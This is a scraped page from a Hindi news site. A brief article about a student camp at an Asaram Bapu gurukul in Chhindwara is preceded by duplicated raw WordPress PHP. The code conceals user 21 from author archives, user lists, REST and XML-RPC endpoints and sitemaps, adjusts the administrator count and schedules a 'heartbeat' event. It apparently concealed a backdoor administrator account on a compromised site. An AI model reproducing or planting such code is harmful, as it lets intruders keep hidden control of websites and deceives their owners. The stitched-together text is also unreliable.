add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
देशभर के हजारों विद्यार्थी शिविर से लाभान्वित - Press Ki Taquat
No Result
View All Result
छिंदवाड़ा(भगवानदीन साहू)- श्री शक्ति ट्रस्ट द्वारा संचालित सन्त श्री आशारामजी गुरुकुल में चार दिवसीय विद्यार्थी उज्जवल भविष्य निर्माण शिविर का समापन सम्पन्न हुआ । विद्यार्थियों में अच्छे संस्कारों का सिंचन हों , स्वस्थ रहें , परीक्षा में अत्यधिक अंक अर्जित करें , देशसेवा के दैवीय गुण विकसित हों ; इस निमित्त प्रतिवर्ष यह आयोजन सम्पन्न होतें हैं । इस अवसर पर गुरुकुल की संचालिका दर्शना खट्टर ने बताया कि आध्यात्मिक शिक्षा के बिना आधुनिक शिक्षा अधूरी है । अच्छे संस्कारों का सिंचन , स्वस्थ रहने के लिए योगासन , मातृभूमि के प्रति लगाव , देश भक्ति के दैवीय गुण हमें आध्यात्मिक शिक्षा ही प्रदान करती है । उक्त गुरुकुल में देश के 24 राज्यों और विदेशों के विद्यार्थी भी अध्ययनरत हैं । आधुनिक शिक्षा और आध्यात्मिक शिक्षा के समन्वय के कारण ही विद्यार्थियों का चहुँमुखी विकास सम्भव होता है । पूज्य बापूजी के आशीर्वाद से देशभर में संचालित सैकड़ों गुरुकुलों में इन दिनों देशभर में यह आयोजन सम्पन्न हो रहें हैं । गुरुकुल छात्रावास में अध्ययनरत विद्यार्थी तो नियमित इन विद्याओं से परिचित हैं ।शहर के बच्चे भी भारी संख्या में अध्ययनरत हैं। इस वजह से उनके ज्ञान में वृद्धि हो इसलिए शिविर का आयोजन किया गया । ऐसे शिविरों के कारण ही बच्चों की वास्तविक योग्यता में निखार आता है । यही गुरुकुल शिक्षा पध्दति भी है ।मुख्य अतिथि के रूप में प्रसिद्ध मोटिवेशन गुरु डॉ. अमर सिंह , राष्ट्रपति पुरुस्कार प्राप्त विनोद तिवारी , योगाचार्य डॉ. राम शंकर , गोविंद भाई , बाल संस्कार के प्रशिक्षक एवं आर्किटेक्ट इंजीनियर प्रवीण भाई , राघवेंद्र वसूले जी ने तीन दिनों तक अलग – अलग सत्र लेकर बच्चों का भविष्य उज्जवल हो ; इस निमित्त जरूरी टिप्स प्रदान किये । शिविर में , गुरुकुल की संचालिका दर्शना खट्टर , समिति के अध्यक्ष मदन मोहन परसाई , पूजा आम्रवंशी ,सुशील सिंह परिहार , छात्रावास प्रभारी सोमनाथ पवार और समस्त स्कूली स्टॉफ़ ने अपनी – अपनी सेवाएं दी ।
Post Views: 136
No Result
View All Result